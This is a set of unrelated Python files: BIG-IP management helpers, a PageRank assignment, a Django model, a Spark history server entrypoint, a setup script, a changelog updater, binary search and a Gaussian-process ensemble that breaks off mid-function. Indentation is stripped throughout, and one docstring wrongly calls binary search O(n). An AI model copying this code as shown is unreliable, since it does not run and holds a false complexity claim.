def get_minor_version(self, bigip):
version = self.get_version(bigip)
if version:
return version.split('.')[1]
return version
def get_version(self, bigip):
devices = bigip.tm.cm.devices.get_collection()
for device in devices:
if device.selfDevice == 'true':
return device.version
return ""
def get_serial_number(self, bigip):
devices = bigip.tm.cm.devices.get_collection()
for device in devices:
if device.selfDevice == 'true':
return device.chassisId
return None
def get_platform(self, bigip):
return ''
def get_tunnel_sync(self, bigip):
db = bigip.tm.sys.dbs.db.load(name='iptunnel.configsync')
if hasattr(db, 'value'):
return db.value
return ''
def set_tunnel_sync(self, bigip, enabled=False):
if enabled:
val = 'enable'
else:
val = 'disable'
db = bigip.tm.sys.dbs.db.load(name='iptunnel.configsync')
db.modify(value=val)
def get_provision_extramb(self, bigip):
db = bigip.tm.sys.dbs.db.load(name='provision.extramb')
if hasattr(db, 'value'):
return db.value
return 0
def get_mac_addresses(self, bigip):
macs = []
interfaces = bigip.tm.net.interfaces.get_collection()
for interface in interfaces:
macs.append(interface.macAddress)
return macs
def get_interface_macaddresses_dict(self, bigip):
# Get dictionary of mac addresses keyed by their interface name
mac_dict = {}
interfaces = bigip.tm.net.interfaces.get_collection()
for interface in interfaces:
mac_dict[interface.name] = interface.macAddress
return mac_dict
def purge_orphaned_folders(self, bigip):
LOG.error("method not implemented")
def purge_orphaned_folders_contents(self, bigip, folders):
LOG.error("method not implemented")
def purge_folder_contents(self, bigip, folder):
network_helper = NetworkHelper()
if folder not in self.exempt_folders:
# First remove all LTM resources.
ltm_types = [
ResourceType.virtual,
ResourceType.pool,
ResourceType.http_monitor,
ResourceType.https_monitor,
ResourceType.tcp_monitor,
ResourceType.ping_monitor,
ResourceType.node,
ResourceType.snat,
ResourceType.snatpool,
ResourceType.snat_translation,
ResourceType.rule
]
for ltm_type in ltm_types:
resource = BigIPResourceHelper(ltm_type)
[r.delete() for r in resource.get_resources(bigip, folder)]
# Remove all net resources
net_types = [
ResourceType.arp,
ResourceType.selfip,
ResourceType.vlan,
ResourceType.route_domain
]
for net_type in net_types:
resource = BigIPResourceHelper(net_type)
[r.delete() for r in resource.get_resources(bigip, folder)]
# Tunnels and fdb's require some special attention.
resource = BigIPResourceHelper(ResourceType.tunnel)
tunnels = resource.get_resources(bigip, folder)
for tunnel in tunnels:
network_helper.delete_all_fdb_entries(
bigip, tunnel.name, folder)
network_helper.delete_tunnel(
bigip, tunnel.name, folder)
def purge_folder(self, bigip, folder):
if folder not in self.exempt_folders:
self.delete_folder(bigip, folder)
else:
LOG.error(
('Request to purge exempt folder %s ignored.' %
folder))
def get_tenant_folder_count(self, bigip):
folders = bigip.tm.sys.folders.get_collection()
# ignore '/' and 'Common'
tenants = [item for item in folders if item.name != '/' and
item.name != 'Common']
return len(tenants)
|
import os
import random
import re
import sys
DAMPING = 0.85
SAMPLES = 10000
def main():
if len(sys.argv) != 2:
sys.exit("Usage: python pagerank.py corpus")
corpus = crawl(sys.argv[1])
ranks = sample_pagerank(corpus, DAMPING, SAMPLES)
print(f"PageRank Results from Sampling (n = {SAMPLES})")
for page in sorted(ranks):
print(f" {page}: {ranks[page]:.4f}")
ranks = iterate_pagerank(corpus, DAMPING)
print(f"PageRank Results from Iteration")
for page in sorted(ranks):
print(f" {page}: {ranks[page]:.4f}")
def crawl(directory):
"""
Parse a directory of HTML pages and check for links to other pages.
Return a dictionary where each key is a page, and values are
a list of all other pages in the corpus that are linked to by the page.
"""
pages = dict()
# Extract all links from HTML files
for filename in os.listdir(directory):
if not filename.endswith(".html"):
continue
with open(os.path.join(directory, filename)) as f:
contents = f.read()
links = re.findall(r"<a\s+(?:[^>]*?)href=\"([^\"]*)\"", contents)
pages[filename] = set(links) - {filename}
# Only include links to other pages in the corpus
for filename in pages:
pages[filename] = set(
link for link in pages[filename]
if link in pages
)
return pages
def transition_model(corpus, page, damping_factor):
"""
Return a probability distribution over which page to visit next,
given a current page.
With probability `damping_factor`, choose a link at random
linked to by `page`. With probability `1 - damping_factor`, choose
a link at random chosen from all pages in the corpus.
"""
# probability-list to initialize weights for random no. generator
p = [damping_factor, 1 - damping_factor]
prob = dict()
linked = set()
unlinked = set()
# from the corpus, get the list of pages that the current page is linked to
# and the list of pages the current page is not linked to
# also set the transition model probabilities to 0.0 initially
for key, value in corpus.items():
prob[key] = 0.0
if key != page:
continue
else:
linked = value
unlinked = set()
for key in corpus:
if key in linked:
continue
else:
unlinked.add(key)
# each page starts with a base probability of reach of (1 - damping_factor)/total_pages
# then each page linked to this page gets an additional probability of
# damping_factor / no_of_links
linked_count = len(linked)
unlinked_count = len(unlinked)
count = linked_count + unlinked_count
prob_0 = p[1] / count
for key in prob:
if key in linked:
prob[key] = prob_0 + damping_factor / linked_count
else:
prob[key] = prob_0
return prob
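# Worked example (a sketch): with corpus {"1": {"2", "3"}, "2": {"3"}, "3": {"2"}},
# page "1" and damping_factor 0.85, each of the 3 pages gets a baseline of
# 0.15 / 3 = 0.05, and the two linked pages each gain 0.85 / 2 = 0.425, so the
# returned distribution is {"1": 0.05, "2": 0.475, "3": 0.475}, which sums to 1.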
def sample_pagerank(corpus, damping_factor, n):
"""
Return PageRank values for each page by sampling `n` pages
according to transition model, starting with a page at random.
Return a dictionary where keys are page names, and values are
their estimated PageRank value (a value between 0 and 1). All
PageRank values should sum to 1.
"""
# Initialise dictionary
keys = corpus.keys()
sample = dict()
for key in keys:
sample[key] = 0
# Random starting page
random_page = random.choice(list(keys))
sample[random_page] += 1 / n
for _ in (range(n-1)):
prob = transition_model(corpus, random_page, damping_factor)
next_pages = []
probabilities = []
for key, value in prob.items():
next_pages.append(key)
probabilities.append(value)
random_page = random.choices(next_pages, weights=probabilities)[0]
sample[random_page] += 1 / n
return sample
def iterate_pagerank(corpus, damping_factor):
"""
Return PageRank values for each page by iteratively updating
PageRank values until convergence.
Return a dictionary where keys are page names, and values are
their estimated PageRank value (a value between 0 and 1). All
PageRank values should sum to 1.
"""
# Total number of pages
num_total_pages = len(corpus)
# Start with 1/N for all pages
rank_old = dict()
for page in corpus:
rank_old[page] = 1 / num_total_pages
while True:
rank_new = dict()
# Calculate PageRank
for page_new in corpus:
rank_page_new = (1 - damping_factor) / num_total_pages
for page, links in corpus.items():
if links:
if page != page_new and page_new in links:
rank_page_new += damping_factor * (rank_old[page] / len(corpus[page]))
else:
rank_page_new += damping_factor * (rank_old[page] / num_total_pages)
rank_new[page_new] = rank_page_new
# Stop if Ranks converged
if rank_convergence(rank_new, rank_old):
return rank_new
rank_old = rank_new.copy()
def rank_convergence(new_rank, old_rank):
for page in new_rank:
# If new probability not calculated
if not new_rank[page]:
return False
# Convergence at 0.001
diff = abs(new_rank[page] - old_rank[page])
if diff > 0.001:
return False
return True
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2015 Alex Headley <aheadley@waysaboutstuff.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import reduce
ROTL = lambda uint32, bits: CAST_TO_UINT32((uint32 << bits) | CAST_TO_CHAR(uint32 >> (32 - bits)))
SPLIT_TO_BYTES = lambda uint32: bytearray((uint32 & (0xFF << s)) >> s \
for s in range(0, 32, 8))
CAST_TO_CHAR = lambda uint32: uint32 & 0xFF
CAST_TO_UINT32 = lambda value: value & 0xFFFFFFFF
COMBINE_BYTES = lambda bytes: reduce(
lambda p, n: p | (n[0] << n[1]),
zip(bytes, range(0, 32, 8)), 0)
|
from django.db import models
from django.contrib.auth.models import User
from classroom.models import Classroom
from PIL import Image
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(User,on_delete = models.CASCADE)
image = models.ImageField(default = 'users/profile_pics/default.jpg', upload_to='users/profile_pics/')
def __str__(self):
return f'{self.user.username} Profile'
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
super().save(force_insert, force_update, using, update_fields)
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300,300)
img.thumbnail(output_size)
img.save(self.image.path)
|
from PandasToPowerpoint import df_to_powerpoint
import pandas as pd
df = pd.DataFrame({'District':['Hampshire', 'Dorset', 'Wiltshire', 'Worcestershire'],
'Population':[25000, 500000, 735298, 12653],
'Ratio':[1.56, 7.34, 3.67, 8.23]})
df_to_powerpoint(r"C:\Code\Powerpoint\test58.pptx", df,
col_formatters=['', ',', '.2'], rounding=['', 3, ''])
|
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Entrypoint for running Spark history server."""
import logging
import click
from smspark import history_server_utils, nginx_utils
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
@click.command(context_settings=dict(allow_interspersed_args=False))
@click.option(
"--event-logs-s3-uri", required=True, help="S3 uri stores spark events that history server can read from",
)
@click.option(
"--remote-domain-name", help="Domain name of remote device when history server is running remotely",
)
@click.pass_context
def run_history_server(ctx: click.Context, event_logs_s3_uri: str, remote_domain_name: str) -> None:
"""Run the Spark History Server."""
nginx_utils.start_nginx(remote_domain_name)
log.info("Running spark history server")
history_server_utils.start_history_server(event_logs_s3_uri)
|
import sys, os, platform, glob
from setuptools import setup, find_packages
"""
Setup script for FusionVet -- A bioinformatics tool to visualize and evaluate *known* gene fusions.
"""
def main():
setup( name = "FusionVet",
version = "1.0.1",
python_requires='>=3.5',
py_modules = [ 'psyco_full' ],
packages = find_packages( 'lib' ),
package_dir = { '': 'lib' },
package_data = { '': ['*.ps'] },
scripts = glob.glob( "bin/*.py"),
ext_modules = [],
test_suite = 'nose.collector',
setup_requires = ['nose>=0.10.4'],
author = "Liguo Wang",
author_email ="wangliguo78@gmail.com",
platforms = ['Linux','MacOS'],
requires = [],
install_requires = ['numpy','scipy','pysam'],
description = "A bioinformatics tool to visualize and evaluate *known* gene fusions",
url = "https://fusionvet.readthedocs.io/en/latest/index.html",
zip_safe = False,
dependency_links = [],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
keywords='gene fusion, validation, visualization, UCSC, BAM, bed, bigBed, interact, bigInteract',
)
if __name__ == "__main__":
main()
|
"""Insert the new version changes in the changelog."""
import re
import sys
import requests
from git_changelog.build import Changelog
from jinja2.sandbox import SandboxedEnvironment
TEMPLATE_URL = "https://raw.githubusercontent.com/pawamoy/jinja-templates/master/keepachangelog.md"
COMMIT_STYLE = "angular"
if __name__ == "__main__":
if len(sys.argv) != 4:
print("usage: update_changelog.py <FILE> <MARKER> <VERSION_REGEX>", file=sys.stderr)
sys.exit(1)
env = SandboxedEnvironment(autoescape=True)
template = env.from_string(requests.get(TEMPLATE_URL).text)
changelog = Changelog(".", style=COMMIT_STYLE)
inplace_file, marker, version_regex = sys.argv[1:]
with open(inplace_file, "r") as fd:
old_lines = fd.read().splitlines(keepends=False)
# get last version
version_re = re.compile(version_regex)
last_released = None
for line in old_lines:
match = version_re.search(line)
if match:
last_released = match.groupdict()["version"]
break
# only keep more recent versions
versions = []
for version in changelog.versions_list:
if version.tag == last_released:
break
versions.append(version)
changelog.versions_list = versions
# render and insert
rendered = template.render(changelog=changelog, inplace=True)
for i in range(len(old_lines)):
if old_lines[i] == marker:
old_lines[i] = rendered
break
with open(inplace_file, "w") as fd:
fd.write("\n".join(old_lines).rstrip("\n") + "\n")
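# Example invocation (a sketch; the marker string and version regex are assumptions,
# though the regex must expose a named group called "version" as used above):
#
#     python update_changelog.py CHANGELOG.md "<!-- insertion marker -->" \
#         "^## \[(?P<version>[^\]]+)\]"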
|
"""
Binary search is a classic recursive algorithm.
It is used to efficiently locate a target value within a sorted sequence of n elements.
"""
def binary_search(data, target, low, high):
"""Binary search implementation, inefficient, O(n)
Return True if target is found in indicated portion of a list.
The search only considers the portion from low to high inclusive.
"""
if low > high:
return False # interval is empty - no match.
else:
mid = (low + high) // 2
if target == data[mid]:
return True
elif target < data[mid]:
return binary_search(data, target, low, mid-1)
else:
return binary_search(data, target, mid+1, high)
def binary_search_iterative(data, target):
"""Return True if target is foudn in the given list."""
low = 0
high = len(data) - 1
while low <= high:
mid = (low + high) // 2
if target == data[mid]: # Found a match.
return True
elif target < data[mid]:
high = mid - 1 # consider values left of mid.
else:
low = mid + 1 # consider values right of mid.
return False
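# Example usage (a small sketch exercising both variants):
if __name__ == '__main__':
    data = [2, 4, 5, 7, 8, 9, 12, 14, 17, 19, 22, 25, 27, 28, 33, 37]
    assert binary_search(data, 22, 0, len(data) - 1)
    assert not binary_search(data, 23, 0, len(data) - 1)
    assert binary_search_iterative(data, 17)
    assert not binary_search_iterative(data, 18)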
|
import discord
from discord.ext import commands
class Development(commands.Cog):
def __init__(self, bot):
self.bot = bot
def setup(bot):
bot.add_cog(Development(bot))
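# A minimal sketch of how a command could be added to this cog (the command name and
# reply are illustrative, not part of the original file):
#
#     @commands.command()
#     async def ping(self, ctx):
#         await ctx.send('pong')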
|
import os
import time
import numpy as np
import collections
import scipy
import scipy.sparse
import scipy.sparse.linalg
import scikits.sparse.cholmod
import sklearn.preprocessing
import hashlib
import types
import marshal
import pyublas
import cPickle as pickle
from collections import OrderedDict
from sigvisa.treegp.gp import GP, GPCov
from sigvisa.treegp.features import featurizer_from_string, recover_featurizer
from sigvisa.treegp.cover_tree import VectorTree
from sigvisa.models.spatial_regression.baseline_models import ParamModel
from sigvisa.utils.fileutils import mkdir_p
class LocalGPEnsemble(ParamModel):
def _build_local_gps(self, X, y, yvars, **kwargs):
cluster_distances = self.cluster_tree.kernel_matrix(pyublas.why_not(X),
pyublas.why_not(self.cluster_centers), True)
closest_cluster = np.argmin(cluster_distances, axis=1)
local_gps = []
sorted_X = []
sorted_y = []
sorted_yvars = []
for i, ctr in enumerate(self.cluster_centers):
cov = self.cluster_covs[i]
noise_var = self.cluster_noise_vars[i]
cluster_idxs = (closest_cluster == i)
cluster_X = X[cluster_idxs]
cluster_y = y[cluster_idxs]
cluster_yvars = yvars[cluster_idxs]
if len(cluster_y) == 0:
cluster_X = np.zeros((1, 5,))
cluster_y = np.zeros((1,))
cluster_yvars = np.ones((1,)) * 1e20
sorted_X.append(cluster_X)
sorted_y.append(cluster_y)
sorted_yvars.append(cluster_yvars)
lgp = GP(X=cluster_X, y=cluster_y, y_obs_variances=cluster_yvars,
cov_main=cov, noise_var=noise_var,
sort_events=False,
sparse_invert=False,
**kwargs)
local_gps.append(lgp)
sorted_X = np.vstack(sorted_X)
sorted_y = np.concatenate(sorted_y)
sorted_yvars = np.concatenate(sorted_yvars)
return local_gps, sorted_X, sorted_y, sorted_yvars
def __init__(self, X, y,
cluster_centers,
cluster_covs,
cluster_noise_vars,
yvars = None,
basis=None,
extract_dim = None,
prior_mean=None,
prior_cov=None,
featurizer_recovery=None,
**kwargs):
ParamModel.__init__(self, **kwargs)
self.cluster_centers = cluster_centers
self.cluster_covs = cluster_covs
self.cluster_noise_vars = cluster_noise_vars
self.cluster_metric = GPCov(wfn_str="se", dfn_str="lld", dfn_params=(1.0, 1.0), wfn_params=(1.0,))
self.cluster_tree = VectorTree(cluster_centers, 1, *self.cluster_metric.tree_params())
if yvars is None:
yvars = np.zeros(y.shape)
self.local_gps, self.X, self.y, self.yvars = self._build_local_gps(X, y, yvars,
compute_ll=(basis is None))
self.local_gp_cache = None
self.n = len(self.y)
self.basis = basis
self.extract_dim = extract_dim
self.prior_mean = prior_mean
self.prior_cov = prior_cov
self.featurizer_recovery = featurizer_recovery
# setup parametric features if needed
H = None
self.featurizer = None
self.featurizer_recovery = None
if featurizer_recovery is None:
if basis is not None:
H, self.featurizer, self.featurizer_recovery = featurizer_from_string(self.X, basis, extract_dim=extract_dim, transpose=True)
else:
self.featurizer, self.featurizer_recovery = recover_featurizer(basis, featurizer_recovery, transpose=True)
H = self.featurizer(self.X)
self.Kinv = scipy.sparse.block_diag([gp.Kinv for gp in self.local_gps])
self.L = scipy.sparse.block_diag([gp.L for gp in self.local_gps])
self.alpha = np.concatenate([gp.alpha_r.flatten() for gp in self.local_gps])
self.local_cumpts = np.cumsum([lgp.n for lgp in self.local_gps])
def build_low_rank_model(alpha, Kinv_sp, H, b, Binv):
"""
let n be the training size; we'll use an additional rank-m approximation.
the notation here follows section 2.7 in Rasmussen & Williams. For
simplicity, K refers to the observation covariance matrix rather than the
underlying function covariance (i.e. it might really be K+noise_var*I, or
K+diag(y_obs_variances), etc.)
takes:
alpha: n x 1, equal to K^-1 y
Kinv_sp: n x n sparse matrix, equal to K^-1
H: n x m features of training data (this is Qfu for FIC)
b: m x 1 prior mean on feature weights (this is 0 for FIC)
B: m x m prior covariance on feature weights (this is Quu for FIC)
returns:
invc = inv(chol(M)), where M = (B^-1 + H K^-1 H^T)^-1 is the
posterior covariance matrix on feature weights
beta_bar = M (HK^-1y + B^-1 b) gives the weights for the correction
of the low-rank component to the mean prediction
HKinv = HK^-1 comes up in the marginal likelihood computation, so we
go ahead and remember the value we compute now.
"""
# tmp = H * K^-1 * y + B^-1 * b
tmp = np.reshape(np.asarray(np.dot(H, alpha)), (-1,))
tmp += np.dot(Binv, b)
HKinv = H * Kinv_sp
M_inv = Binv + np.dot(HKinv, H.T)
c = scipy.linalg.cholesky(M_inv, lower=True)
beta_bar = scipy.linalg.cho_solve((c, True), tmp)
invc = scipy.linalg.inv(c)
return c, invc, beta_bar, HKinv
if self.basis is None:
self.n_features = 0
else:
self.n_features = len(self.prior_mean)
b = self.prior_mean
Binv = np.linalg.inv(self.prior_cov)
self.c, self.invc,self.beta_bar, self.HKinv = build_low_rank_model(self.alpha,
self.Kinv,
H, b, Binv)
self.z = np.dot(H.T, b) - self.y
def _x_to_cluster(self, X1):
dists = self.cluster_tree.kernel_matrix(X1, self.cluster_centers, True)
return np.argmin(dists, axis=1)
def param_mean(self):
try:
return self.beta_bar
except:
return np.zeros((0,))
def param_covariance(self, chol=False):
if chol:
return self.invc
else:
return np.dot(self.invc.T, self.invc)
def get_data_features(self, X):
# compute the full set of features for a matrix X of test points
features = np.zeros((self.n_features, X.shape[0]))
i = 0
if self.featurizer is not None:
F = self.featurizer(X)
i = F.shape[0]
features[:i,:] = F
return features
def sample(self, cond, include_obs=True, **kwargs):
mean = self.predict(cond)
variance = self.variance(cond, include_obs=include_obs)
return np.random.randn() * np.sqrt(variance) + mean
def log_p(self, x, cond, include_obs=True, **kwargs):
y = float(x)
mean = float(self.predict(cond))
variance = float(self.variance(cond, include_obs=include_obs))
return - .5 * ((y-mean)**2 / variance + np.log(2*np.pi*variance) )
def force_load_localgps(self):
self.cache_capacity = len(self.local_gps)
for i in range(len(self.local_gps)):
self.local_gps[i] = self.get_local_gp(i)
def get_local_gp(self, idx):
# note there's no real reason for a separate self.local_gps
# and self.local_gp_cache, so self.local_gps could probably be
# eliminated.
idx = int(idx)
if self.local_gps[idx] is None:
fname = os.path.join(self.lazyload_localgp_dir, "local%03d.gp" % idx)
lgp = GP(fname=fname, sparse_invert=True)
self.local_gps[idx] = lgp
if self.local_gp_cache is not None:
# if needed, evict oldest from cache, and delete from self.local_gps
if len(self.local_gp_cache) >= self.cache_capacity:
k, v = self.local_gp_cache.popitem(last=False)
self.local_gps[k] = None
nloaded = len(self.local_gp_cache)
#print "loaded lgp %s, total loaded %d" % (fname, nloaded)
if self.local_gp_cache is not None:
if idx in self.local_gp_cache:
_ = self.local_gp_cache.pop(idx)
self.local_gp_cache[idx] = self.local_gps[idx]
return self.local_gps[idx]
def predict(self, cond, **kwargs):
# TODO: cache features and R between predict and variance calls...
X1 = self.standardize_input_array(cond).astype(np.float)
cluster_idx = self._x_to_cluster(X1)
lgp = self.get_local_gp(cluster_idx)
gp_pred = float(lgp.predict(X1))
if self.n_features > 0:
query_K = lgp.get_query_K(X1, no_R=True)
H = self.get_data_features(X1)
k = self.local_cumpts[cluster_idx-1] if cluster_idx > 0 else 0
local_HKinv = np.matrix(self.HKinv[:, k:k+lgp.n])
R = H - local_HKinv * query_K
gp_pred += float(np.dot(R.T, self.beta_bar))
return gp_pred
def variance(self, cond, **kwargs):
X1 = self.standardize_input_array(cond).astype(np.float)
assert(X1.shape[0] == 1)
cluster_idx = self._x_to_cluster(X1)
lgp = self.get_local_gp(cluster_idx)
gp_variance = float(lgp.variance(X1, **kwargs))
if self.n_features > 0:
query_K = lgp.get_query_K(X1, no_R=True)
H = self.get_data_features(X1)
k = self.local_cumpts[cluster_idx-1] if cluster_idx > 0 else 0
local_HKinv = np.matrix(self.HKinv[:, k:k+lgp.n])
R = H - local_HKinv * query_K
tmp = np.dot(self.invc, R)
mean_cov = np.dot(tmp.T, tmp)
gp_variance += float(mean_cov)
return gp_variance
def log_likelihood(self):
self.force_load_localgps()
if self.n_features == 0:
ll = np.sum([gp.log_likelihood() for gp in self.local_gps])
return ll
Kinv = self.Kinv
z = self.z
tmp1 = Kinv * z
term1 = np.dot(z.T, tmp1)
tmp2 = np.dot(self.HKinv, z)
tmp3 = np.dot(self.invc, tmp2)
term2 = np.dot(tmp3.T, tmp3)
# following eqn 2.43 in R&W, we want to compute
# log det(K + H.T * B * H). using the matrix inversion
# lemma, we instead compute
# log det(K) + log det(B) + log det(B^-1 + H*K^-1*H.T)
# to compute log(det(K)), we use the trick that the
# determinant of a symmetric pos. def. matrix is the
# product of squares of the diagonal elements of the
# Cholesky factor
ldiag = self.L.diagonal()
ld2_K = np.log(ldiag).sum()
ld2 = np.log(np.diag(self.c)).sum() # det( B^-1 + H * K^-1 * H.T )
ld_B = np.linalg.slogdet(self.prior_cov)[1]
# eqn 2.43 in R&W, using the matrix inv lemma
ll = -.5 * (term1 - term2 + self.n * np.log(2*np.pi) + ld_B) - ld2_K - ld2
return ll
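# Illustrative check of the Cholesky log-determinant identity used above
# (a standalone sketch, not part of the model): for a symmetric positive
# definite matrix A, log det(A) is twice the sum of the logs of the diagonal
# of its Cholesky factor, e.g.
#   A = np.array([[4., 2.], [2., 3.]])
#   L = np.linalg.cholesky(A)
#   2 * np.log(np.diag(L)).sum()   # ~2.0794
#   np.linalg.slogdet(A)[1]        # ~2.0794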
def log_likelihood_gradient(self):
nparams = np.sum([len(c.flatten())+1 for c in self.cluster_covs])
grad = np.zeros((nparams,))
if self.n_features > 0:
tmp = np.dot(self.invc, self.HKinv)
K_HBH_inv = self.Kinv - np.dot(tmp.T, tmp)
alpha = np.matrix(np.reshape(np.dot(K_HBH_inv, self.z), (-1, 1)))
M = np.matrix(K_HBH_inv)
else:
M = self.Kinv.todense()
alpha = self.alpha
npts = 0
nparams = 0
self.force_load_localgps()
for k, lgp in enumerate(self.local_gps):
lgp.distance_cache_XX = lgp.predict_tree.kernel_matrix(lgp.X, lgp.X, True)
n_main_params = len(lgp.cov_main.flatten())
local_alpha = alpha[npts:npts+lgp.n]
local_M = M[npts:npts+lgp.n][:, npts:npts+lgp.n]
npts += lgp.n
for i in range(n_main_params+1):
dKdi = lgp.get_dKdi_dense(i, n_main_params, 0)
dlldi = .5 * np.dot(local_alpha.T, np.dot(dKdi, local_alpha))
# here we use the fact:
# trace(AB) = sum_{ij} A_ij * B_ij
dlldi -= .5 * np.sum(np.sum(np.multiply(local_M.T, dKdi)))
grad[nparams] = dlldi
nparams += 1
return grad
def get_flat_params(self):
params = []
self.force_load_localgps()
for lgp in self.local_gps:
params.append(lgp.noise_var)
params += list(lgp.cov_main.flatten())
return params
def __getstate__(self):
d = self.__dict__.copy()
del d["cluster_tree"]
n = len(self.local_gps)
d['local_gps'] = [None,] * n
try:
del d["Kinv"]
except:
pass
try:
del d["L"]
except:
pass
try:
del d["featurizer"]
except:
pass
return d
def __setstate__(self, d):
self.__dict__ = d
self.local_gp_cache = OrderedDict()
self.cluster_tree = VectorTree(self.cluster_centers, 1, *self.cluster_metric.tree_params())
if self.basis is not None:
self.featurizer, self.featurizer_recovery = recover_featurizer(self.basis, self.featurizer_recovery, transpose=True)
else:
self.featurizer = None
self.featurizer_recovery = None
def save_trained_model(self, fname):
mkdir_p(fname)
for i, lgp in enumerate(self.local_gps):
local_fname = os.path.join(fname, "local%03d.gp" % i)
lgp.save_trained_model(local_fname, tight=True)
with open(os.path.join(fname, "main.pkl"), "wb") as f:
pickle.dump(self, f)
def load_lgp_ensemble(fname, cache_capacity=15):
with open(os.path.join(fname, "main.pkl"), "rb") as f:
lgp = pickle.load(f)
lgp.lazyload_localgp_dir = fname
lgp.cache_capacity = cache_capacity
#lgp.force_load_localgps()
return lgp
def optimize_localgp_hyperparams(noise_prior=None,
cov_main=None,
cluster_centers=None,
y_list = None,
yvars_list = None,
force_unit_var=False,
**kwargs):
n_clusters = len(cluster_centers)
n_wfn = len(cov_main.wfn_params)
n_dfn = len(cov_main.dfn_params)
nparams = 1 + n_wfn + n_dfn
nparams *= n_clusters
if y_list is None:
y_list = [kwargs["y"],]
del kwargs["y"]
if yvars_list is None:
if "yvars" in kwargs:
yvars_list = [kwargs["yvars"]]
del kwargs["yvars"]
else:
yvars_list = [None,] * len(y_list)
def expand_reduced_params(rparams):
# given a set of params that includes only the signal/noise
# ratio, expand to the full parameterization assuming unit
# total variance.
# standard param order:
# noise var, signal var, lscale horiz, lscale depth
params = []
for i in range(0, len(rparams), 3):
# ratio = nv/sv = nv / (1-nv)
ratio10 = rparams[i]
ratio = ratio10 / 10.0
nv = ratio / (1.+ratio)
if nv == 1.0:
nv = 1.-1e-10
elif nv == 0.0:
nv = 1e-10
sv = 1.0-nv
lscale_horiz = rparams[i+1]
lscale_depth = rparams[i+2]
params.append(nv)
params.append(sv)
params.append(lscale_horiz)
params.append(lscale_depth)
return np.array(params)
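# Worked example of the reduced parameterization (illustrative): a reduced
# vector [10., 5., 3.] means ratio10=10, so ratio=1.0, hence nv=0.5 and
# sv=0.5, expanding to the full vector [0.5, 0.5, 5., 3.]
# (noise var, signal var, lscale horiz, lscale depth).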
def reduce_params(params):
rparams = []
for i in range(0, len(params), 4):
# ratio = nv/sv = nv / (1-nv)
nv = params[i]
sv = params[i+1]
ratio = nv/sv
ratio10 = ratio * 10
lscale_horiz = params[i+2]
lscale_depth = params[i+3]
rparams.append(ratio10)
rparams.append(lscale_horiz)
rparams.append(lscale_depth)
return np.array(rparams)
def grad_reduced_params(gfull, params):
rgrad = []
for i in range(0, len(gfull), 4):
d_nv = gfull[i]
d_sv = gfull[i+1]
d_lhoriz = gfull[i+2]
d_ldepth = gfull[i+3]
nv = params[i]
sv = params[i+1]
ratio = nv/sv
# dll_dratio = dll_dnv dnv_dratio + dll_dsv dsv_dratio
d_ratio = d_nv * 1./(ratio+1.)**2 + d_sv * -1. / (ratio+1.)**2
d_ratio10 = d_ratio / 10.0
rgrad.append(d_ratio10)
rgrad.append(d_lhoriz)
rgrad.append(d_ldepth)
return np.array(rgrad)
def covs_from_vector(params):
covs = []
noise_vars = []
k = 0
for c in cluster_centers:
new_cov = cov_main.copy()
nv = params[k]
k += 1
new_cov.wfn_params = np.array(params[k:k+n_wfn])
k += n_wfn
new_cov.dfn_params = np.array(params[k:k+n_dfn])
k += n_dfn
covs.append(new_cov)
noise_vars.append(nv)
return covs, noise_vars
def nllgrad(v):
if not np.all(np.isfinite(v)):
return np.float('inf'), np.zeros(v.shape)
try:
expv = np.exp(v)
if force_unit_var:
expv = expand_reduced_params(expv)
cluster_covs, cluster_noise_vars = covs_from_vector(expv)
grad_expv = np.zeros(expv.shape)
ll = 0.0
for i, (y, yvars) in enumerate(zip(y_list, yvars_list)):
lgps = LocalGPEnsemble(cluster_centers=cluster_centers,
cluster_covs=cluster_covs,
cluster_noise_vars=cluster_noise_vars,
y=y, yvars=yvars, **kwargs)
param_ll = lgps.log_likelihood()
ll += param_ll
grad_expv += lgps.log_likelihood_gradient()
del lgps
prior_grad = []
priorll = 0.0
for i, cc in enumerate(cluster_centers):
priorll += noise_prior.log_p(cluster_noise_vars[i])
priorll += cluster_covs[i].prior_logp()
prior_grad.append(noise_prior.deriv_log_p(cluster_noise_vars[i]))
prior_grad += list(cluster_covs[i].prior_grad())
prior_grad = np.array(prior_grad)
grad_expv += prior_grad
ll += priorll
if force_unit_var:
grad_expv = grad_reduced_params(grad_expv, expv)
grad_v = grad_expv * np.exp(v)
#print "expv", expv, "ll", ll
if np.isinf(ll):
import pdb; pdb.set_trace()
if np.isinf(np.sum(grad_v)):
import pdb; pdb.set_trace()
if np.isnan(grad_v).any():
print "warning: nans in gradient", grad_v
